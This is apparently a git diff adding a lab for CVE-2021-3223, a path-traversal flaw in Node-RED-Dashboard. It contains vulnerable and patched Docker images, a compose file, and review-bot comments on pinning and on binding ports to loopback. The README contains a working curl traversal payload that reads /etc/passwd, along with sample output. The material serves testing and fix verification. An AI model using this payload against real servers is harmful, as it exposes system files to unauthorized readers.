diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile.safe b/nodejs/node-red/CVE-2021-3223/Dockerfile.safe
new file mode 100644
index 00000000..5dce5640
--- /dev/null
+++ b/nodejs/node-red/CVE-2021-3223/Dockerfile.safe
@@ -0,0 +1,5 @@
+FROM nodered/node-red:1.1.2
+
+RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production
+
+RUN npm install node-red-dashboard@2.26.2
diff --git a/nodejs/node-red/CVE-2021-3223/Dockerfile b/nodejs/node-red/CVE-2021-3223/Dockerfile.vuln
similarity index 100%
rename from nodejs/node-red/CVE-2021-3223/Dockerfile
rename to nodejs/node-red/CVE-2021-3223/Dockerfile.vuln
diff --git a/nodejs/node-red/CVE-2021-3223/README.md b/nodejs/node-red/CVE-2021-3223/README.md
index d98ca35d..497a027e 100644
--- a/nodejs/node-red/CVE-2021-3223/README.md
+++ b/nodejs/node-red/CVE-2021-3223/README.md
@@ -4,3 +4,27 @@
 This directory contains the deployment configs for a directory traversal vulnerability in Node-RED-Dashboard with node-red version (1.1.2).
 The deployed service has name `cve-2021-3223` and listens on port `1880`.
+
+## Docker Compose
+```
+docker compose up
+```
+
+The vulnerable service will listen on port `8081` and the safe service will listen on port `8082`.
+
+## Confirming the vulnerability
+
+
+```
+curl --path-as-is 'localhost:8081/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
+```
+Vulnerable output:
+```
+root:x:0:0:root:/root:/bin/ash
+bin:x:1:1:bin:/bin:/sbin/nologin
+...
+```
+Safe output (replace the port with 8082):
+```
+Not Found
+```
\ No newline at end of file
diff --git a/nodejs/node-red/CVE-2021-3223/docker-compose.yml b/nodejs/node-red/CVE-2021-3223/docker-compose.yml
new file mode 100644
index 00000000..f5d53c88
--- /dev/null
+++ b/nodejs/node-red/CVE-2021-3223/docker-compose.yml
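Review bot: The `RUN npm install node-red-dashboard@2.26.2` line is the whole of the fix in Dockerfile.safe, but nothing records why that exact version was chosen, so whoever next bumps the pin has no anchor; add `# 2.26.2 is the first node-red-dashboard release not affected by CVE-2021-3223 (ui_base/js/..%2f path traversal)` directly above it. The preceding `RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production` re-runs a dependency install against whatever package.json the base image's working directory holds; the vulnerable Dockerfile is a 100% rename and not shown here, so I cannot tell whether that line is required for the safe variant or simply carried over, and it is worth confirming the two files differ only in the dashboard pin. Both steps use plain `npm install` with no lockfile, so the safe image is reproducible only as far as the explicit `@2.26.2` pin; that is acceptable for a lab image, but a one-line comment saying so would stop a reader from assuming the rest of the dependency tree is fixed.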
@@ -0,0 +1,14 @@
+version: "3.9"
+
+services:
+ vuln:
+ build:
+ dockerfile: Dockerfile.vuln
+ ports:
+ - "8081:1880"
+
+ safe:
+ build:
+ dockerfile: Dockerfile.safe
+ ports:
+ - "8082:1880"
\ No newline at end of file
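Review bot: Both `ports` entries publish on every host interface, so the intentionally vulnerable container, which the README in this same change shows returning `/etc/passwd` to an unauthenticated request, is reachable from the surrounding network for as long as the lab is up; bind both mappings to loopback with `- "127.0.0.1:8081:1880"` and `- "127.0.0.1:8082:1880"`. The `version: "3.9"` key is ignored by the Compose v2 CLI that the README's `docker compose up` invokes and only yields a warning, so it can be dropped. Neither `build` block names a `context`; if the intent is the directory containing this file, `context: .` states that explicitly rather than relying on the tool's default.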